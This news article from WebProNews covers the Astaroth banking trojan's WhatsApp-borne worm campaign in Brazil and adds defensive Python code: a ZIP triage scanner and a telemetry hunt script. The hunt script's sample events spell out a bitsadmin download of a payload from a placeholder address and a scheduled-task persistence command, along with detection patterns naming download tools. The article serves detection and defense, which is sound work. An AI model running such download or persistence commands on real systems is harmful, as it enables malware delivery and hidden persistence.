The Pink Dolphin’s Digital Hunt: WhatsApp’s Role in Reviving a Notorious Banking Trojan
In the ever-evolving world of cybersecurity threats, a familiar foe has resurfaced with a clever twist, leveraging one of the world’s most popular messaging apps to target users in Brazil. The Astaroth banking trojan, long known for its stealthy tactics in stealing financial data, is now propagating through WhatsApp in a worm-like fashion. This campaign, dubbed “Boto-Cor-de-Rosa” or “Pink Dolphin,” marks a significant escalation in how malware authors exploit social platforms for automated spread. The recent reports drawn on below underscore the growing intersection between everyday communication tools and sophisticated cybercrime.
The infection chain begins innocuously: a WhatsApp message arrives carrying a ZIP file with a harmless-looking name. The archive contains a Visual Basic script; once the victim extracts and runs it on a Windows system, the script downloads the core Astaroth payload. What sets this variant apart is a Python-based module built specifically for WhatsApp Web. Running on the infected PC, it drives the victim’s already logged-in WhatsApp Web session to harvest the contact list and send malicious messages to those contacts, creating a self-perpetuating cycle that mimics a worm’s behavior.
Cybersecurity researchers have been quick to dissect this threat. According to a detailed analysis by The Hacker News, the malware focuses on Brazilian users, exploiting the region’s heavy reliance on WhatsApp for both personal and business communications. The ZIP files often masquerade as legitimate documents, such as invoices or updates, luring victims into extracting and running the embedded script.
Unpacking the Mechanics of Infection
Delving deeper into the technical underpinnings, the Astaroth trojan employs heavy obfuscation to evade detection. The initial Visual Basic script fetches additional components from remote servers, including the Python worm module. That module does not break into WhatsApp itself: it uses browser automation to locate a WhatsApp Web session the victim is already logged into and operates it from the inside to extract contacts. It’s a testament to the malware’s adaptability, building on Astaroth’s history of using living-off-the-land binaries (LOLBins) so that its activity blends into normal system processes.
Once installed, the trojan targets banking credentials, keystrokes, and clipboard data, with a particular emphasis on Brazilian financial institutions. Persistence is achieved through registry modifications and scheduled tasks, ensuring the malware survives reboots; both leave artifacts that endpoint telemetry can pick up. The worm aspect amplifies its reach: by auto-messaging contacts, it turns infected devices into unwitting distributors, potentially infecting entire networks of friends, family, and colleagues.
Insights from SiliconANGLE highlight how this campaign differs from prior Astaroth iterations, which relied on phishing emails or malicious websites. The shift to WhatsApp introduces a social engineering layer that’s harder to mitigate, as messages appear to come from trusted sources. Acronis International GmbH, the firm that first reported on “Boto-Cor-de-Rosa,” notes the campaign’s use of randomly generated filenames to avoid pattern-based detection, a trick that defeats filters keyed on the archive’s name but not inspection of what the archive contains.
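To show why a random archive name does not help the attacker once the archive is opened by a scanner rather than a user, here is an added Python triage script. It is not code from the campaign, from Acronis, or from any other source cited in this article. It lists a ZIP without extracting anything and flags members Windows would execute, including double-extension lures and archives nested inside archives; it goes slightly beyond the article by handling the nested case. The three sample archives are constructed in memory and their member names are invented.

```python
"""Static triage of a WhatsApp-delivered ZIP without extracting it.

Added example for this article; not code from the Astaroth campaign or
from any vendor report cited here. The three sample archives are
constructed in memory, and their member names are invented.
"""
import io
import os
import zipfile

# Extensions Windows hands to a script host, the shell, or an installer
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
               ".bat", ".cmd", ".ps1", ".lnk", ".scr", ".exe", ".msi"}
# Extensions used as the "harmless" half of a double extension
LURE_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}


def _exts(member_name):
    """Return the member's base name and its extensions, e.g. ['.pdf', '.vbs']."""
    base = os.path.basename(member_name.replace("\\", "/")).lower()
    parts = base.split(".")
    return parts[0], ["." + p for p in parts[1:]]


def triage_zip(data, depth=0, max_depth=2):
    """Return a list of findings; an empty list means no executable content found."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    findings = []
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            _, exts = _exts(info.filename)
            if not exts:
                continue
            last = exts[-1]
            if last in SCRIPT_EXTS:
                note = "executable member: %s (%s)" % (info.filename, last)
                if len(exts) > 1 and exts[-2] in LURE_EXTS:
                    note += " [double extension posing as %s]" % exts[-2]
                findings.append(note)
            elif last == ".zip" and depth < max_depth:
                # Recurse into nested archives, a cheap way for attackers to add a layer
                for inner in triage_zip(zf.read(info), depth + 1, max_depth):
                    findings.append("%s -> %s" % (info.filename, inner))
    return findings


def _make_zip(members):
    """Build a ZIP in memory from {name: bytes}; used only for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples (placeholder contents, not real malware)
LURE_ZIP = _make_zip({"Fatura_4f2a.pdf.vbs": b"' placeholder VBScript\r\nMsgBox \"oi\"\r\n"})
NESTED_ZIP = _make_zip({"doc_83f1.zip": _make_zip({"comprovante.js": b"// placeholder\n"})})
BENIGN_ZIP = _make_zip({"relatorio_mensal.pdf": b"%PDF-1.4\n%placeholder\n"})

if __name__ == "__main__":
    for label, blob in (("lure", LURE_ZIP), ("nested", NESTED_ZIP), ("benign", BENIGN_ZIP)):
        print(label, triage_zip(blob) or ["no executable content"])
```

The check keys on the last extension of each member, so “Fatura.pdf.vbs” is treated as a script no matter what the outer archive is called. A mail or chat gateway that applied this before delivery would strip the lure regardless of the random names Acronis describes.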
Historical Context and Evolution of Astaroth
Astaroth isn’t new to the scene; it first gained notoriety around 2018 for its fileless techniques, loading directly into memory to avoid leaving traces on disk. Over the years, it has targeted Latin American users, particularly in Brazil, where digital banking is widespread. Microsoft Threat Intelligence documented significant updates in 2020, emphasizing its evasion tactics using system tools like bitsadmin and regsvr32.
The current resurgence builds on this foundation but innovates by bridging the phone-centric app and the desktop: the worm module works through the WhatsApp Web session in the victim’s desktop browser rather than through the phone app. Posts on X (formerly Twitter) from cybersecurity experts reflect growing alarm; for instance, accounts like The Hacker News have shared alerts about the worm’s auto-sending capabilities, urging users to verify suspicious messages. This echoes earlier Android-based WhatsApp worms analyzed by researchers like Lukas Stefanko, who in 2019 and 2021 detailed malware that replied to messages with malicious links.
Sophos, in a November 2025 blog post, described a similar campaign involving credential theft and session hijacking. That earlier variant spread worm-like through WhatsApp, deploying multiple payloads for persistence. The “Boto-Cor-de-Rosa” evolution adds the Python worm, making it more autonomous: propagation no longer depends on the operators sending each phishing wave themselves.
The Brazilian Focus and Broader Implications
Brazil’s digital ecosystem makes it a prime target. With over 100 million WhatsApp users, the app serves as a lifeline for communication, often blending personal chats with business dealings. Hackread reports that the trojan steals banking credentials tailored to local banks, potentially leading to widespread financial fraud. The malware’s focus on Windows systems aligns with the many Brazilian users who still access bank web portals from a desktop browser, the same place a linked WhatsApp Web session lives.
This isn’t isolated; X posts from sources like Cointelegraph in late 2025 warned of similar worms stealing crypto wallet access, indicating a trend toward multifunctional stealers. In Brazil, where economic instability can heighten cybercrime incentives, such threats exploit trust in messaging apps. Security Affairs, in its coverage, notes how the worm automatically forwards messages, creating the potential for exponential spread.
The campaign’s naming as “Boto-Cor-de-Rosa” draws from Amazonian folklore, symbolizing the pink river dolphin’s mythical allure, much like how the malware lures victims with benign appearances. OffSeq.com’s Threat Radar provides real-time updates on infection vectors, emphasizing the need for behavioral analysis tools to detect anomalies in WhatsApp usage.
Detection Challenges and Mitigation Strategies
Detecting Astaroth in this form poses unique hurdles. Traditional antivirus may miss the obfuscated scripts, and the worm’s reliance on the victim’s legitimate WhatsApp Web session complicates endpoint monitoring, since the traffic is real WhatsApp traffic from a real login. Industry insiders recommend multi-layered defenses: enabling two-factor authentication on banking apps, scrutinizing ZIP attachments before extracting them, reviewing WhatsApp’s linked devices and unlinking any session the user does not recognize, and, on managed Windows endpoints, restricting Windows Script Host so a double-clicked .vbs file cannot run.
From a corporate perspective, enterprises in Brazil should implement strict policies on WhatsApp usage for work, perhaps routing communications through secure alternatives. Acronis also recommends keeping WhatsApp and Windows updated; that is sound baseline hygiene, but the chain described here relies on the victim running the script rather than on a software vulnerability, so patching alone does not stop this campaign. User education is therefore key: training to recognize phishing via unexpected files, even from known contacts.
X sentiment, as seen in posts from figures like Tola Joseph Fadugbagbe, underscores the annoyance and harm of such worms, with calls for vigilance against data theft targeting crypto and banking. CyberMaterial’s analysis confirms the Python worm’s role in automatic propagation through contact lists, a tactic that could inspire copycat campaigns globally.
Global Ramifications and Future Threats
While currently confined to Brazil, the techniques in “Boto-Cor-de-Rosa” could migrate elsewhere. WhatsApp’s global user base of over 2 billion offers a vast attack surface. If adapted for other regions, it might target different financial systems, from European banks to Asian mobile wallets. TechJuice reports that official sources confirm the malware’s spread via compromised accounts, highlighting the need for platform-level interventions by Meta.
SempreUpdate, in its Portuguese coverage, advises Brazilian users on protection: avoid opening unknown attachments, log out of WhatsApp Web sessions, and monitor for unusual activity. This aligns with broader industry advice to integrate threat intelligence feeds for proactive defense.
The resurgence of Astaroth via WhatsApp signals a shift toward socially engineered, automated malware. For insiders, it prompts a reevaluation of how messaging apps fit into security frameworks. As threats like this evolve, collaboration between platforms, researchers, and users becomes essential to stem the tide.
Emerging Defenses and Industry Response
Antivirus vendors are racing to update signatures, but behavioral detection remains crucial. The chain leaves a recognizable sequence in process telemetry: a script host launching a .vbs from a temp or download folder, that script host spawning a downloader LOLBin, a Python interpreter from a user-writable directory driving a browser, and a scheduled task or run key pointing back at that directory. Tools that watch for that sequence can flag the Python module early. Enterprises might consider zero-trust models, treating all incoming messages as potential threats.
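The following added hunt script turns the stages the article describes (VBS dropper, LOLBin download, Python-driven browser automation, scheduled-task or run-key persistence) into rules over process-creation events and correlates them per host. It is illustrative code for this article, not a detection shipped by any vendor named here. The event records are reduced Sysmon-style fields constructed for the demo; the hostnames, paths, the 203.0.113.10 download address and the command-line indicators for browser automation (selenium, chromedriver, web.whatsapp.com) are assumptions, since the article does not publish the module’s actual command line.

```python
"""Hunt for the Astaroth/WhatsApp-worm chain in process-creation telemetry.

Added example for this article, not from any vendor report cited here.
Events are Sysmon Event ID 1-style records reduced to a few fields and
constructed for the demo. Hostnames, paths, the 203.0.113.10 address and
the browser-automation indicators are assumptions; the staged chain itself
follows the article's description.
"""
import re

# Paths an ordinary user can write to, where droppers and the Python module land
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|Temp|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_LOLBINS = {"bitsadmin.exe", "certutil.exe", "regsvr32.exe", "mshta.exe"}
# Assumed indicators of a Python process driving a browser at WhatsApp Web
AUTOMATION_HINTS = re.compile(r"selenium|chromedriver|webdriver|playwright|web\.whatsapp\.com", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run", re.I)


def _exe(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def rules_for(ev):
    """Return the names of every rule a single event trips."""
    image, parent, cmd = _exe(ev["image"]), _exe(ev["parent_image"]), ev["cmdline"]
    hits = []
    # Stage 1: script host running a .vbs/.vbe from a user-writable path
    if image in SCRIPT_HOSTS and re.search(r"\.vb[se]\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append("vbs_dropper_from_user_path")
    # Stage 2: script host spawning a download or proxy-execution LOLBin
    if parent in SCRIPT_HOSTS and image in DOWNLOAD_LOLBINS:
        hits.append("lolbin_spawned_by_script_host")
    # Stage 3: Python interpreter from a user-writable path driving a browser
    if image.startswith("python") and USER_WRITABLE.search(ev["image"]) and AUTOMATION_HINTS.search(cmd):
        hits.append("python_browser_automation")
    # Stage 4: persistence via scheduled task or run key pointing at a user-writable path
    if image == "schtasks.exe" and "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
        hits.append("schtasks_persistence_user_path")
    if image == "reg.exe" and RUN_KEY.search(cmd) and " add " in cmd.lower():
        hits.append("run_key_persistence")
    return hits


def score_hosts(events):
    """Collect the distinct rules tripped on each host."""
    per_host = {}
    for ev in events:
        for rule in rules_for(ev):
            per_host.setdefault(ev["host"], set()).add(rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


def alerts(events, min_stages=2):
    """Hosts showing at least min_stages distinct stages; one stage alone is noise."""
    return {h: r for h, r in score_hosts(events).items() if len(r) >= min_stages}


# Constructed sample events: BR-WS-017 shows the full chain, BR-WS-042 is benign
SAMPLE_EVENTS = [
    {"host": "BR-WS-017", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\AppData\Local\Temp\Temp1_Fatura_4f2a.zip\Fatura_4f2a.vbs"'},
    {"host": "BR-WS-017", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"bitsadmin /transfer j1 /download /priority high http://203.0.113.10/p.bin C:\Users\ana\AppData\Local\Temp\p.bin"},
    {"host": "BR-WS-017", "image": r"C:\Users\ana\AppData\Roaming\pyw\python.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"C:\Users\ana\AppData\Roaming\pyw\python.exe C:\Users\ana\AppData\Roaming\pyw\wa.py --driver chromedriver.exe --url https://web.whatsapp.com"},
    {"host": "BR-WS-017", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'schtasks /create /sc onlogon /tn "UpdateChk" /tr "C:\Users\ana\AppData\Roaming\pyw\python.exe C:\Users\ana\AppData\Roaming\pyw\wa.py"'},
    # Benign: developer running browser tests from an installed Python, admin creating a backup task
    {"host": "BR-WS-042", "image": r"C:\Program Files\Python312\python.exe",
     "parent_image": r"C:\Program Files\JetBrains\PyCharm\bin\pycharm64.exe",
     "cmdline": r'"C:\Program Files\Python312\python.exe" -m pytest tests\ui --driver chromedriver.exe'},
    {"host": "BR-WS-042", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]

if __name__ == "__main__":
    for host, stages in alerts(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(stages))
```

Requiring two distinct stages on the same host keeps a developer’s selenium run or an administrator’s scheduled task from paging anyone, while the victim workstation trips all four. In production the same rules map directly onto Sysmon or EDR process-creation fields; the command-line indicators for the Python module should be replaced with whatever the responder actually observes in a sample.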
Looking ahead, Meta could enhance WhatsApp’s security with AI-driven anomaly detection, flagging mass messaging from a single linked-device session. Regulatory bodies in Brazil, already vigilant on data privacy, may also press platforms for stricter handling of the executable attachments and hijacked sessions this campaign abuses.
In the end, “Boto-Cor-de-Rosa” exemplifies how old threats reinvent themselves, blending technical prowess with social manipulation. Staying ahead requires not just technology, but a cultural shift toward skepticism in digital interactions.


WebProNews is an iEntry Publication